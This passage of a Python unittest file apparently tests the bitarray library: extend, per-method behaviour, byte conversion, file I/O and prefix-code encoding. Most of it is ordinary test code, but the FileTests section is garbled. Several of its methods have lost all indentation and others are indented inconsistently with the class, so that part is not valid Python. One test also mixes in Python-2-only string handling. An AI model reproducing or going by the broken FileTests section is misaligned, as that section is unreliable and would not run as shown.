        a = bitarray()
        a.extend(bitarray())
        self.assertEqual(a, bitarray())
        a.extend(bitarray('110'))
        self.assertEqual(a, bitarray('110'))
        a.extend(bitarray('1110'))
        self.assertEqual(a, bitarray('1101110'))
        # bit values are preserved even across different endianness
        a = bitarray('00001111', endian='little')
        a.extend(bitarray('00111100', endian='big'))
        self.assertEqual(a, bitarray('0000111100111100'))
        for a in self.randombitarrays():
            for b in self.randombitarrays():
                c = bitarray(a)
                idc = id(c)
                c.extend(b)
                self.assertEqual(id(c), idc)  # extend works in place
                self.assertEqual(c, a + b)

    def test_list(self):
        a = bitarray()
        # arbitrary objects are interpreted by their truth value
        a.extend([0, 1, 3, None, {}])
        self.assertEqual(a, bitarray('01100'))
        a.extend([True, False])
        self.assertEqual(a, bitarray('0110010'))
        for a in self.randomlists():
            for b in self.randomlists():
                c = bitarray(a)
                idc = id(c)
                c.extend(b)
                self.assertEqual(id(c), idc)
                self.assertEqual(c.tolist(), a + b)
                self.check_obj(c)

    def test_tuple(self):
        a = bitarray()
        a.extend((0, 1, 2, 0, 3))
        self.assertEqual(a, bitarray('01101'))
        for a in self.randomlists():
            for b in self.randomlists():
                c = bitarray(a)
                idc = id(c)
                c.extend(tuple(b))
                self.assertEqual(id(c), idc)
                self.assertEqual(c.tolist(), a + b)
                self.check_obj(c)

    def test_generator(self):
        def bar():
            for x in ('', '1', None, True, []):
                yield x
        a = bitarray()
        a.extend(bar())
        self.assertEqual(a, bitarray('01010'))
        for a in self.randomlists():
            for b in self.randomlists():
                def foo():
                    for e in b:
                        yield e
                c = bitarray(a)
                idc = id(c)
                c.extend(foo())
                self.assertEqual(id(c), idc)
                self.assertEqual(c.tolist(), a + b)
                self.check_obj(c)

    def test_iterator1(self):
        a = bitarray()
        a.extend(iter([3, 9, 0, 1, -2]))
        self.assertEqual(a, bitarray('11011'))
        for a in self.randomlists():
            for b in self.randomlists():
                c = bitarray(a)
                idc = id(c)
                c.extend(iter(b))
                self.assertEqual(id(c), idc)
                self.assertEqual(c.tolist(), a + b)
                self.check_obj(c)

    def test_iterator2(self):
        a = bitarray()
        a.extend(itertools.repeat(True, 23))
        self.assertEqual(a, bitarray(23 * '1'))

    def test_string01(self):
        a = bitarray()
        a.extend('0110111')
        self.assertEqual(a, bitarray('0110111'))
        for a in self.randomlists():
            for b in self.randomlists():
                c = bitarray(a)
                idc = id(c)
                c.extend(''.join(['0', '1'][x] for x in b))
                self.assertEqual(id(c), idc)
                self.assertEqual(c.tolist(), a + b)
                self.check_obj(c)

    def test_extend_self(self):
        # extending a bitarray with itself must not loop or corrupt it
        a = bitarray()
        a.extend(a)
        self.assertEqual(a, bitarray())
        a = bitarray('1')
        a.extend(a)
        self.assertEqual(a, bitarray('11'))
        a = bitarray('110')
        a.extend(a)
        self.assertEqual(a, bitarray('110110'))
        for a in self.randombitarrays():
            b = bitarray(a)
            a.extend(a)
            self.assertEqual(a, b + b)

tests.append(ExtendTests)
# ---------------------------------------------------------------------------
class MethodTests(unittest.TestCase, Util):
    """Per-method tests: append, insert, index, count, search/itersearch,
    fill, sort, reverse, tolist, remove, pop, setall and bytereverse."""

    def test_append(self):
        a = bitarray()
        a.append(True)
        a.append(False)
        a.append(False)
        self.assertEQUAL(a, bitarray('100'))
        # non-bool items are interpreted by their truth value
        a.append(0)
        a.append(1)
        a.append(2)
        a.append(None)
        a.append('')
        a.append('a')
        self.assertEQUAL(a, bitarray('100011001'))
        for a in self.randombitarrays():
            aa = a.tolist()
            b = a
            b.append(1)
            self.assertTrue(a is b)  # append works in place
            self.check_obj(b)
            self.assertEQUAL(b, bitarray(aa+[1], endian=a.endian()))
            b.append('')
            self.assertEQUAL(b, bitarray(aa+[1, 0], endian=a.endian()))

    def test_insert(self):
        a = bitarray()
        b = a
        a.insert(0, True)
        self.assertTrue(a is b)  # insert works in place
        self.assertEqual(a, bitarray('1'))
        self.assertRaises(TypeError, a.insert)
        self.assertRaises(TypeError, a.insert, None)
        for a in self.randombitarrays():
            aa = a.tolist()
            for _ in range(50):
                item = bool(randint(0, 1))
                # out-of-range positions clip, exactly like list.insert
                pos = randint(-len(a) - 2, len(a) + 2)
                a.insert(pos, item)
                aa.insert(pos, item)
            self.assertEqual(a.tolist(), aa)
            self.check_obj(a)

    def test_index1(self):
        a = bitarray()
        for i in (True, False, 1, 0):
            self.assertRaises(ValueError, a.index, i)
        a = bitarray(100 * [False])
        self.assertRaises(ValueError, a.index, True)
        self.assertRaises(TypeError, a.index)
        self.assertRaises(TypeError, a.index, 1, 'a')
        self.assertRaises(TypeError, a.index, 1, 0, 'a')
        self.assertRaises(TypeError, a.index, 1, 0, 100, 1)
        a[20] = a[27] = 1
        self.assertEqual(a.index(42), 20)  # 42 is truthy -> searches for 1
        self.assertEqual(a.index(1, 21), 27)
        self.assertEqual(a.index(1, 27), 27)
        self.assertEqual(a.index(1, -73), 27)
        self.assertRaises(ValueError, a.index, 1, 5, 17)
        self.assertRaises(ValueError, a.index, 1, 5, -83)
        self.assertRaises(ValueError, a.index, 1, 21, 27)
        self.assertRaises(ValueError, a.index, 1, 28)
        self.assertEqual(a.index(0), 0)
        a = bitarray(200 * [True])
        self.assertRaises(ValueError, a.index, False)
        a[173] = a[187] = 0
        self.assertEqual(a.index(False), 173)
        self.assertEqual(a.index(True), 0)

    def test_index2(self):
        # a single deviating bit at any position is found
        for n in range(50):
            for m in range(n):
                a = bitarray(n)
                a.setall(0)
                self.assertRaises(ValueError, a.index, 1)
                a[m] = 1
                self.assertEqual(a.index(1), m)
                a.setall(1)
                self.assertRaises(ValueError, a.index, 0)
                a[m] = 0
                self.assertEqual(a.index(0), m)

    def test_index3(self):
        a = bitarray('00001000' '00000000' '0010000')
        self.assertEqual(a.index(1), 4)
        self.assertEqual(a.index(1, 1), 4)
        self.assertEqual(a.index(0, 4), 5)
        self.assertEqual(a.index(1, 5), 18)
        self.assertRaises(ValueError, a.index, 1, 5, 18)
        self.assertRaises(ValueError, a.index, 1, 19)

    def test_index4(self):
        # mirror image of test_index3 (searching for 0 in mostly-1s)
        a = bitarray('11110111' '11111111' '1101111')
        self.assertEqual(a.index(0), 4)
        self.assertEqual(a.index(0, 1), 4)
        self.assertEqual(a.index(1, 4), 5)
        self.assertEqual(a.index(0, 5), 18)
        self.assertRaises(ValueError, a.index, 0, 5, 18)
        self.assertRaises(ValueError, a.index, 0, 19)

    def test_index5(self):
        # random start/stop ranges agree with list.index
        a = bitarray(2000)
        a.setall(0)
        for _ in range(3):
            a[randint(0, 1999)] = 1
        aa = a.tolist()
        for _ in range(100):
            start = randint(0, 2000)
            stop = randint(0, 2000)
            try:
                res1 = a.index(1, start, stop)
            except ValueError:
                res1 = None
            try:
                res2 = aa.index(1, start, stop)
            except ValueError:
                res2 = None
            self.assertEqual(res1, res2)

    def test_index6(self):
        # negative and out-of-range bounds must clip like list.index
        for n in range(1, 50):
            a = bitarray(n)
            i = randint(0, 1)
            a.setall(i)
            for unused in range(randint(1, 4)):
                a[randint(0, n-1)] = 1-i
            aa = a.tolist()
            for unused in range(100):
                start = randint(-50, n+50)
                stop = randint(-50, n+50)
                try:
                    res1 = a.index(1-i, start, stop)
                except ValueError:
                    res1 = None
                try:
                    res2 = aa.index(1-i, start, stop)
                except ValueError:
                    res2 = None
                self.assertEqual(res1, res2)

    def test_count1(self):
        a = bitarray('10011')
        self.assertEqual(a.count(), 3)  # default counts set bits
        self.assertEqual(a.count(True), 3)
        self.assertEqual(a.count(False), 2)
        self.assertEqual(a.count(1), 3)
        self.assertEqual(a.count(0), 2)
        # arbitrary objects are interpreted by their truth value
        self.assertEqual(a.count(None), 2)
        self.assertEqual(a.count(''), 2)
        self.assertEqual(a.count('A'), 3)
        self.assertRaises(TypeError, a.count, 0, 'A')
        self.assertRaises(TypeError, a.count, 0, 0, 'A')

    def test_count2(self):
        for i in range(0, 256):
            a = bitarray()
            a.frombytes(bytes(bytearray([i])))
            self.assertEqual(a.count(), a.to01().count('1'))

    def test_count3(self):
        for a in self.randombitarrays():
            s = a.to01()
            self.assertEqual(a.count(1), s.count('1'))
            self.assertEqual(a.count(0), s.count('0'))

    def test_count4(self):
        # count over every [i, j) range of an all-ones array is j - i
        N = 37
        a = bitarray(N)
        a.setall(1)
        for i in range(N):
            for j in range(i, N):
                self.assertEqual(a.count(1, i, j), j - i)

    def test_count5(self):
        for endian in 'big', 'little':
            a = bitarray('01001100' '01110011' '01', endian)
            self.assertEqual(a.count(), 9)
            self.assertEqual(a.count(0, 12), 3)
            self.assertEqual(a.count(1, -5), 3)
            self.assertEqual(a.count(1, 2, 17), 7)
            self.assertEqual(a.count(1, 6, 11), 2)
            self.assertEqual(a.count(0, 7, -3), 4)
            self.assertEqual(a.count(1, 1, -1), 8)
            self.assertEqual(a.count(1, 17, 14), 0)  # empty range

    def test_count6(self):
        # count(x, i, j) agrees with slicing the 01-string
        for a in self.randombitarrays():
            s = a.to01()
            i = randint(-3, len(a)+1)
            j = randint(-3, len(a)+1)
            self.assertEqual(a.count(1, i, j), s[i:j].count('1'))
            self.assertEqual(a.count(0, i, j), s[i:j].count('0'))

    def test_search(self):
        a = bitarray('')
        self.assertEqual(a.search(bitarray('0')), [])
        self.assertEqual(a.search(bitarray('1')), [])
        a = bitarray('1')
        self.assertEqual(a.search(bitarray('0')), [])
        self.assertEqual(a.search(bitarray('1')), [0])
        self.assertEqual(a.search(bitarray('11')), [])
        a = bitarray(100*'1')
        self.assertEqual(a.search(bitarray('0')), [])
        self.assertEqual(a.search(bitarray('1')), list(range(100)))
        a = bitarray('10010101110011111001011')
        for limit in range(10):
            # the second argument limits the number of matches returned
            self.assertEqual(a.search(bitarray('011'), limit),
                             [6, 11, 20][:limit])
        self.assertRaises(ValueError, a.search, bitarray())
        self.assertRaises(TypeError, a.search, '010')

    def test_itersearch(self):
        a = bitarray('10011')
        self.assertRaises(ValueError, a.itersearch, bitarray())
        self.assertRaises(TypeError, a.itersearch, '')
        it = a.itersearch(bitarray('1'))
        self.assertEqual(next(it), 0)
        self.assertEqual(next(it), 3)
        self.assertEqual(next(it), 4)
        self.assertStopIteration(it)

    def test_search2(self):
        a = bitarray('10011')
        for s, res in [('0', [1, 2]), ('1', [0, 3, 4]),
                       ('01', [2]), ('11', [3]),
                       ('000', []), ('1001', [0]),
                       ('011', [2]), ('0011', [1]),
                       ('10011', [0]), ('100111', [])]:
            b = bitarray(s)
            # search() and itersearch() must yield the same positions
            self.assertEqual(a.search(b), res)
            self.assertEqual([p for p in a.itersearch(b)], res)

    def test_search3(self):
        a = bitarray('10010101110011111001011')
        for s, res in [('011', [6, 11, 20]),
                       ('111', [7, 12, 13, 14]), # note the overlap
                       ('1011', [5, 19]),
                       ('100', [0, 9, 16])]:
            b = bitarray(s)
            self.assertEqual(a.search(b), res)
            self.assertEqual(list(a.itersearch(b)), res)
            self.assertEqual([p for p in a.itersearch(b)], res)

    def test_search4(self):
        # with a limit of 1, search behaves like str.find
        for a in self.randombitarrays():
            aa = a.to01()
            for sub in '0', '1', '01', '01', '11', '101', '1111111':
                sr = a.search(bitarray(sub), 1)
                try:
                    p = sr[0]
                except IndexError:
                    p = -1
                self.assertEqual(p, aa.find(sub))

    def test_search_type(self):
        a = bitarray('10011')
        it = a.itersearch(bitarray('1'))
        # NOTE(review): type(x) is always an instance of type, so this
        # assertion can never fail; it only proves itersearch() returned.
        self.assertIsInstance(type(it), type)

    def test_fill(self):
        a = bitarray('')
        self.assertEqual(a.fill(), 0)
        self.assertEqual(len(a), 0)
        a = bitarray('101')
        # fill() pads with zeros up to the next byte boundary and
        # returns the number of bits added
        self.assertEqual(a.fill(), 5)
        self.assertEQUAL(a, bitarray('10100000'))
        self.assertEqual(a.fill(), 0)
        self.assertEQUAL(a, bitarray('10100000'))
        for a in self.randombitarrays():
            aa = a.tolist()
            la = len(a)
            b = a
            self.assertTrue(0 <= b.fill() < 8)
            self.assertEqual(b.endian(), a.endian())
            bb = b.tolist()
            lb = len(b)
            self.assertTrue(a is b)  # fill works in place
            self.check_obj(b)
            if la % 8 == 0:
                # already byte-aligned: nothing changes
                self.assertEqual(bb, aa)
                self.assertEqual(lb, la)
            else:
                self.assertTrue(lb % 8 == 0)
                self.assertNotEqual(bb, aa)
                self.assertEqual(bb[:la], aa)
                self.assertEqual(b[la:], (lb-la)*bitarray('0'))
                self.assertTrue(0 < lb-la < 8)

    def test_sort(self):
        a = bitarray('1101000')
        a.sort()
        self.assertEqual(a, bitarray('0000111'))
        a = bitarray('1101000')
        a.sort(reverse=True)
        self.assertEqual(a, bitarray('1110000'))
        a.sort(reverse=False)
        self.assertEqual(a, bitarray('0000111'))
        a.sort(True)   # reverse may also be given positionally
        self.assertEqual(a, bitarray('1110000'))
        a.sort(False)
        self.assertEqual(a, bitarray('0000111'))
        self.assertRaises(TypeError, a.sort, 'A')
        N = 100000
        a = bitarray(randint(N, N + 100))
        for dum in range(100):
            a[randint(0, N - 1)] = randint(0, 1)
        b = a.tolist()
        a.sort()
        self.assertEqual(a, bitarray(sorted(b)))
        for a in self.randombitarrays():
            b = a.tolist()
            ida = id(a)
            rev = randint(0, 1)
            a.sort(rev)
            self.assertEqual(a, bitarray(sorted(b, reverse=rev)))
            self.assertEqual(id(a), ida)  # sorting happens in place

    def test_reverse(self):
        self.assertRaises(TypeError, bitarray().reverse, 42)
        for x, y in [('', ''), ('1', '1'), ('10', '01'), ('001', '100'),
                     ('1110', '0111'), ('11100', '00111'),
                     ('011000', '000110'), ('1101100', '0011011'),
                     ('11110000', '00001111'),
                     ('11111000011', '11000011111'),
                     ('11011111' '00100000' '000111',
                      '111000' '00000100' '11111011')]:
            a = bitarray(x)
            a.reverse()
            self.assertEQUAL(a, bitarray(y))
        for a in self.randombitarrays():
            aa = a.tolist()
            b = bitarray(a)
            ida = id(a)
            a.reverse()
            self.assertEqual(ida, id(a))  # reversal happens in place
            self.assertEQUAL(a, bitarray(aa[::-1], endian=a.endian()))
            self.assertEqual(a, b[::-1])

    def test_tolist(self):
        a = bitarray()
        self.assertEqual(a.tolist(), [])
        a = bitarray('110')
        # tolist() yields bools
        self.assertEqual(a.tolist(), [True, True, False])
        for lst in self.randomlists():
            a = bitarray(lst)
            self.assertEqual(a.tolist(), lst)

    def test_remove(self):
        a = bitarray()
        for i in (True, False, 1, 0):
            self.assertRaises(ValueError, a.remove, i)
        a = bitarray(21)
        a.setall(0)
        self.assertRaises(ValueError, a.remove, 1)
        a.setall(1)
        self.assertRaises(ValueError, a.remove, 0)
        a = bitarray('1010110')
        # remove() deletes the first occurrence only
        for val, res in [(False, '110110'), (True, '10110'),
                         (1, '0110'), (1, '010'), (0, '10'),
                         (0, '1'), (1, '')]:
            a.remove(val)
            self.assertEQUAL(a, bitarray(res))
        a = bitarray('0010011')
        b = a
        b.remove('1')  # truthy string is interpreted as 1
        self.assertTrue(b is a)  # removal happens in place
        self.assertEQUAL(b, bitarray('000011'))

    def test_pop(self):
        for x, n, r, y in [('1', 0, True, ''),
                           ('0', -1, False, ''),
                           ('0011100', 3, True, '001100')]:
            a = bitarray(x)
            self.assertEqual(a.pop(n), r)
            self.assertEqual(a, bitarray(y))
        a = bitarray('01')
        self.assertEqual(a.pop(), True)  # default pops the last bit
        self.assertEqual(a.pop(), False)
        # pop from empty bitarray
        self.assertRaises(IndexError, a.pop)
        for a in self.randombitarrays():
            self.assertRaises(IndexError, a.pop, len(a))
            self.assertRaises(IndexError, a.pop, -len(a)-1)
            if len(a) == 0:
                continue
            aa = a.tolist()
            enda = a.endian()
            self.assertEqual(a.pop(), aa[-1])
            self.check_obj(a)
            self.assertEqual(a.endian(), enda)
        for a in self.randombitarrays(start=1):
            # positions, including negative ones, agree with list.pop
            n = randint(-len(a), len(a)-1)
            aa = a.tolist()
            self.assertEqual(a.pop(n), aa[n])
            aa.pop(n)
            self.assertEqual(a, bitarray(aa))
            self.check_obj(a)

    def test_setall(self):
        a = bitarray(5)
        a.setall(True)
        self.assertEQUAL(a, bitarray('11111'))
        for a in self.randombitarrays():
            val = randint(0, 1)
            b = a
            b.setall(val)
            self.assertEqual(b, bitarray(len(b) * [val]))
            self.assertTrue(a is b)  # setall works in place
            self.check_obj(b)

    def test_bytereverse(self):
        # bytereverse() reverses the bit order within each byte
        # (including the zero padding of a partial last byte)
        for x, y in [('', ''),
                     ('1', '0'),
                     ('1011', '0000'),
                     ('111011', '001101'),
                     ('11101101', '10110111'),
                     ('000000011', '100000000'),
                     ('11011111' '00100000' '000111',
                      '11111011' '00000100' '001110')]:
            a = bitarray(x)
            a.bytereverse()
            self.assertEqual(a, bitarray(y))
        for i in range(256):
            a = bitarray()
            a.frombytes(bytes(bytearray([i])))
            aa = a.tolist()
            b = a
            b.bytereverse()
            self.assertEqual(b, bitarray(aa[::-1]))
            self.assertTrue(a is b)  # reversal happens in place
            self.check_obj(b)

tests.append(MethodTests)
# ---------------------------------------------------------------------------
class StringTests(unittest.TestCase, Util):
    """Byte-level conversions: frombytes, tobytes, unpack and pack."""

    def randombytes(self):
        # helper: yields random byte strings of length 1 .. 19
        for n in range(1, 20):
            yield os.urandom(n)

    def test_frombytes(self):
        a = bitarray(endian='big')
        a.frombytes(b'A')
        self.assertEqual(a, bitarray('01000001'))
        b = a
        b.frombytes(b'BC')  # frombytes appends, in place
        self.assertEQUAL(b, bitarray('01000001' '01000010' '01000011',
                                     endian='big'))
        self.assertTrue(b is a)
        for b in self.randombitarrays():
            c = b.copy()
            b.frombytes(b'')  # appending nothing changes nothing
            self.assertEQUAL(b, c)
        for b in self.randombitarrays():
            for s in self.randombytes():
                a = bitarray(endian=b.endian())
                a.frombytes(s)
                c = b.copy()
                b.frombytes(s)
                self.assertEQUAL(b[-len(a):], a)
                self.assertEQUAL(b[:-len(a)], c)
                self.assertEQUAL(b, c + a)

    def test_tobytes(self):
        a = bitarray()
        self.assertEqual(a.tobytes(), b'')
        for end in ('big', 'little'):
            a = bitarray(endian=end)
            a.frombytes(b'foo')
            self.assertEqual(a.tobytes(), b'foo')
            for s in self.randombytes():
                # frombytes/tobytes round-trip for either endianness
                a = bitarray(endian=end)
                a.frombytes(s)
                self.assertEqual(a.tobytes(), s)
        # the unused pad bits of a partial last byte are zero
        for n, s in [(1, b'\x01'), (2, b'\x03'), (3, b'\x07'), (4, b'\x0f'),
                     (5, b'\x1f'), (6, b'\x3f'), (7, b'\x7f'), (8, b'\xff'),
                     (12, b'\xff\x0f'), (15, b'\xff\x7f'), (16, b'\xff\xff'),
                     (17, b'\xff\xff\x01'), (24, b'\xff\xff\xff')]:
            a = bitarray(n, endian='little')
            a.setall(1)
            self.assertEqual(a.tobytes(), s)

    def test_unpack(self):
        a = bitarray('01')
        if is_py3k:
            self.assertIsInstance(a.unpack(), bytes)
        else:
            self.assertIsInstance(a.unpack(), str)
        # default: one byte per bit, 0 -> 0x00 and 1 -> 0xff
        self.assertEqual(a.unpack(), b'\x00\xff')
        self.assertEqual(a.unpack(b'A'), b'A\xff')
        self.assertEqual(a.unpack(b'0', b'1'), b'01')
        self.assertEqual(a.unpack(one=b'\x01'), b'\x00\x01')
        self.assertEqual(a.unpack(zero=b'A'), b'A\xff')
        self.assertEqual(a.unpack(one=b't', zero=b'f'), b'ft')
        # zero may not be given both positionally and by keyword
        self.assertRaises(TypeError, a.unpack, b'a', zero=b'b')
        self.assertRaises(TypeError, a.unpack, foo=b'b')
        for a in self.randombitarrays():
            self.assertEqual(a.unpack(b'0', b'1'), a.to01().encode())
            # pack() is the inverse of unpack()
            b = bitarray()
            b.pack(a.unpack())
            self.assertEqual(b, a)
            b = bitarray()
            b.pack(a.unpack(b'\x01', b'\x00'))
            b.invert()
            self.assertEqual(b, a)

    def test_pack(self):
        a = bitarray()
        a.pack(b'\x00')
        self.assertEqual(a, bitarray('0'))
        a.pack(b'\xff')
        self.assertEqual(a, bitarray('01'))
        # any non-zero byte packs to 1
        a.pack(b'\x01\x00\x7a')
        self.assertEqual(a, bitarray('01101'))
        a = bitarray()
        for n in range(256):
            a.pack(bytes(bytearray([n])))
        self.assertEqual(a, bitarray('0' + 255 * '1'))
        self.assertRaises(TypeError, a.pack, 0)
        if is_py3k:
            self.assertRaises(TypeError, a.pack, '1')
        self.assertRaises(TypeError, a.pack, [1, 3])
        self.assertRaises(TypeError, a.pack, bitarray())

tests.append(StringTests)
# ---------------------------------------------------------------------------
class FileTests(unittest.TestCase, Util):
def setUp(self):
self.tmpdir = tempfile.mkdtemp()
self.tmpfname = os.path.join(self.tmpdir, 'testfile')
def tearDown(self):
shutil.rmtree(self.tmpdir)
def test_pickle(self):
for v in range(3):
for a in self.randombitarrays():
with open(self.tmpfname, 'wb') as fo:
pickle.dump(a, fo, v)
b = pickle.load(open(self.tmpfname, 'rb'))
self.assertFalse(b is a)
self.assertEQUAL(a, b)
def test_shelve(self):
if not shelve or hasattr(sys, 'gettotalrefcount'):
return
d = shelve.open(self.tmpfname)
stored = []
for a in self.randombitarrays():
key = hashlib.md5(repr(a).encode() +
a.endian().encode()).hexdigest()
d[key] = a
stored.append((key, a))
d.close()
del d
d = shelve.open(self.tmpfname)
for k, v in stored:
self.assertEQUAL(d[k], v)
d.close()
def test_fromfile_wrong_args(self):
b = bitarray()
self.assertRaises(TypeError, b.fromfile)
self.assertRaises(TypeError, b.fromfile, StringIO()) # file not open
self.assertRaises(TypeError, b.fromfile, 42)
self.assertRaises(TypeError, b.fromfile, 'bar')
def test_from_empty_file(self):
with open(self.tmpfname, 'wb') as fo:
pass
a = bitarray()
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a, bitarray())
def test_from_large_file(self):
N = 100000
with open(self.tmpfname, 'wb') as fo:
fo.write(N * b'X')
a = bitarray()
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(len(a), 8 * N)
self.assertEqual(a.buffer_info()[1], N)
# make sure there is no over-allocation
self.assertEqual(a.buffer_info()[4], N)
def test_fromfile_Foo(self):
with open(self.tmpfname, 'wb') as fo:
fo.write(b'Foo\n')
a = bitarray(endian='big')
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a, bitarray('01000110011011110110111100001010'))
a = bitarray(endian='little')
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a, bitarray('01100010111101101111011001010000'))
a = bitarray('1', endian='little')
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a, bitarray('101100010111101101111011001010000'))
for n in range(20):
a = bitarray(n, endian='little')
a.setall(1)
a.fromfile(open(self.tmpfname, 'rb'))
self.assertEqual(a,
n*bitarray('1') +
bitarray('01100010111101101111011001010000'))
def test_fromfile_n(self):
    """fromfile(f, n) reads exactly n bytes from the current file position."""
    a = bitarray()
    a.fromstring('ABCDEFGHIJ')
    with open(self.tmpfname, 'wb') as fo:
        a.tofile(fo)
    b = bitarray()
    with open(self.tmpfname, 'rb') as f:
        b.fromfile(f, 0); self.assertEqual(b.tostring(), '')
        b.fromfile(f, 1); self.assertEqual(b.tostring(), 'A')
        f.read(1)  # skip 'B' in the underlying file
        b = bitarray()
        b.fromfile(f, 2); self.assertEqual(b.tostring(), 'CD')
        b.fromfile(f, 1); self.assertEqual(b.tostring(), 'CDE')
        b.fromfile(f, 0); self.assertEqual(b.tostring(), 'CDE')
        # without n, read to EOF; a second call at EOF appends nothing
        b.fromfile(f); self.assertEqual(b.tostring(), 'CDEFGHIJ')
        b.fromfile(f); self.assertEqual(b.tostring(), 'CDEFGHIJ')
    b = bitarray()
    with open(self.tmpfname, 'rb') as f:
        f.read(1);
        # asking for more bytes than remain raises EOFError, but the
        # bytes that WERE available are still appended to b
        self.assertRaises(EOFError, b.fromfile, f, 10)
    self.assertEqual(b.tostring(), 'BCDEFGHIJ')
    b = bitarray()
    with open(self.tmpfname, 'rb') as f:
        b.fromfile(f);
        self.assertEqual(b.tostring(), 'ABCDEFGHIJ')
        # at EOF, requesting even one byte raises EOFError
        self.assertRaises(EOFError, b.fromfile, f, 1)
def test_tofile(self):
    """tofile() writes the buffer; pad bits of the last byte are zero-filled."""
    a = bitarray()
    with open(self.tmpfname, 'wb') as f:
        a.tofile(f)
    with open(self.tmpfname, 'rb') as fi:
        self.assertEqual(fi.read(), b'')

    a = bitarray('01000110011011110110111100001010', endian='big')
    with open(self.tmpfname, 'wb') as f:
        a.tofile(f)
    with open(self.tmpfname, 'rb') as fi:
        self.assertEqual(fi.read(), b'Foo\n')

    for a in self.randombitarrays():
        b = bitarray(a, endian='big')
        with open(self.tmpfname, 'wb') as fo:
            b.tofile(fo)
        # read back via a context manager (the original leaked the handle)
        with open(self.tmpfname, 'rb') as fi:
            s = fi.read()
        self.assertEqual(len(s), a.buffer_info()[1])

    for n in range(3):
        a.fromstring(n * 'A')
        self.assertRaises(TypeError, a.tofile)
        self.assertRaises(TypeError, a.tofile, StringIO())
        with open(self.tmpfname, 'wb') as f:
            a.tofile(f)
        # writing to the now-closed file must fail
        self.assertRaises(TypeError, a.tofile, f)

    for n in range(20):
        a = n * bitarray('1', endian='little')
        with open(self.tmpfname, 'wb') as fo:
            a.tofile(fo)
        with open(self.tmpfname, 'rb') as fi:
            s = fi.read()
        self.assertEqual(len(s), a.buffer_info()[1])
        # fill() pads the last byte with zeros up to a byte boundary --
        # the file contents must equal the padded bitarray
        b = a.copy()
        b.fill()
        c = bitarray(endian='little')
        c.frombytes(s)
        self.assertEqual(c, b)
tests.append(FileTests)
# ---------------------------------------------------------------------------
class PrefixCodeTests(unittest.TestCase, Util):
    """Tests for encode()/decode()/iterdecode() with prefix codes.

    A code dict maps hashable symbols to non-empty bitarrays.  encode()
    appends code words, decode() consumes the whole bitarray eagerly,
    and iterdecode() yields symbols lazily.  The code dict must never be
    mutated by any of these operations.
    """

    def test_encode_string(self):
        a = bitarray()
        d = {'a': bitarray('0')}
        a.encode(d, '')
        self.assertEqual(a, bitarray())
        a.encode(d, 'a')
        self.assertEqual(a, bitarray('0'))
        # the code dict is left unchanged
        self.assertEqual(d, {'a': bitarray('0')})

    def test_encode_list(self):
        a = bitarray()
        d = {'a': bitarray('0')}
        a.encode(d, [])
        self.assertEqual(a, bitarray())
        a.encode(d, ['a'])
        self.assertEqual(a, bitarray('0'))
        self.assertEqual(d, {'a': bitarray('0')})

    def test_encode_iter(self):
        # encode() accepts arbitrary iterables, including generators
        a = bitarray()
        d = {'a': bitarray('0'), 'b': bitarray('1')}
        a.encode(d, iter('abba'))
        self.assertEqual(a, bitarray('0110'))

        def foo():
            for c in 'bbaabb':
                yield c

        a.encode(d, foo())
        self.assertEqual(a, bitarray('0110110011'))
        self.assertEqual(d, {'a': bitarray('0'), 'b': bitarray('1')})

    def test_encode(self):
        d = {'I': bitarray('1'),
             'l': bitarray('01'),
             'a': bitarray('001'),
             'n': bitarray('000')}
        a = bitarray()
        a.encode(d, 'Ilan')
        self.assertEqual(a, bitarray('101001000'))
        # encode() appends to existing content
        a.encode(d, 'a')
        self.assertEqual(a, bitarray('101001000001'))
        self.assertEqual(d, {'I': bitarray('1'), 'l': bitarray('01'),
                             'a': bitarray('001'), 'n': bitarray('000')})
        # symbols not present in the code raise ValueError
        self.assertRaises(ValueError, a.encode, d, 'arvin')

    def test_encode_symbol_not_in_code(self):
        # symbols may be any hashable objects, not just characters
        d = {None : bitarray('0'),
             0 : bitarray('10'),
             'A' : bitarray('11')}
        a = bitarray()
        a.encode(d, ['A', None, 0])
        self.assertEqual(a, bitarray('11010'))
        self.assertRaises(ValueError, a.encode, d, [1, 2])
        self.assertRaises(ValueError, a.encode, d, 'ABCD')

    def test_encode_not_iterable(self):
        d = {'a': bitarray('0'), 'b': bitarray('1')}
        a = bitarray()
        a.encode(d, 'abba')
        self.assertRaises(TypeError, a.encode, d, 42)
        self.assertRaises(TypeError, a.encode, d, 1.3)
        self.assertRaises(TypeError, a.encode, d, None)
        # failed encode() calls must not have appended anything
        self.assertEqual(a, bitarray('0110'))

    def test_check_codedict_encode(self):
        # invalid code dicts: wrong type, empty, non-bitarray values,
        # empty bitarray code words
        a = bitarray()
        self.assertRaises(TypeError, a.encode, None, '')
        self.assertRaises(ValueError, a.encode, {}, '')
        self.assertRaises(TypeError, a.encode, {'a': 'b'}, '')
        self.assertRaises(ValueError, a.encode, {'a': bitarray()}, '')
        self.assertEqual(len(a), 0)

    def test_check_codedict_decode(self):
        a = bitarray('101')
        self.assertRaises(TypeError, a.decode, 0)
        self.assertRaises(ValueError, a.decode, {})
        self.assertRaises(TypeError, a.decode, {'a': 42})
        self.assertRaises(ValueError, a.decode, {'a': bitarray()})
        self.assertEqual(a, bitarray('101'))

    def test_check_codedict_iterdecode(self):
        a = bitarray('1100101')
        self.assertRaises(TypeError, a.iterdecode, 0)
        self.assertRaises(ValueError, a.iterdecode, {})
        self.assertRaises(TypeError, a.iterdecode, {'a': []})
        self.assertRaises(ValueError, a.iterdecode, {'a': bitarray()})
        self.assertEqual(a, bitarray('1100101'))

    def test_decode_simple(self):
        d = {'I': bitarray('1'),
             'l': bitarray('01'),
             'a': bitarray('001'),
             'n': bitarray('000')}
        dcopy = dict(d)
        a = bitarray('101001000')
        self.assertEqual(a.decode(d), ['I', 'l', 'a', 'n'])
        # neither the code dict nor the bitarray is consumed
        self.assertEqual(d, dcopy)
        self.assertEqual(a, bitarray('101001000'))

    def test_iterdecode_simple(self):
        d = {'I': bitarray('1'),
             'l': bitarray('01'),
             'a': bitarray('001'),
             'n': bitarray('000')}
        dcopy = dict(d)
        a = bitarray('101001000')
        self.assertEqual(list(a.iterdecode(d)), ['I', 'l', 'a', 'n'])
        self.assertEqual(d, dcopy)
        self.assertEqual(a, bitarray('101001000'))

    def test_decode_empty(self):
        d = {'a': bitarray('1')}
        a = bitarray()
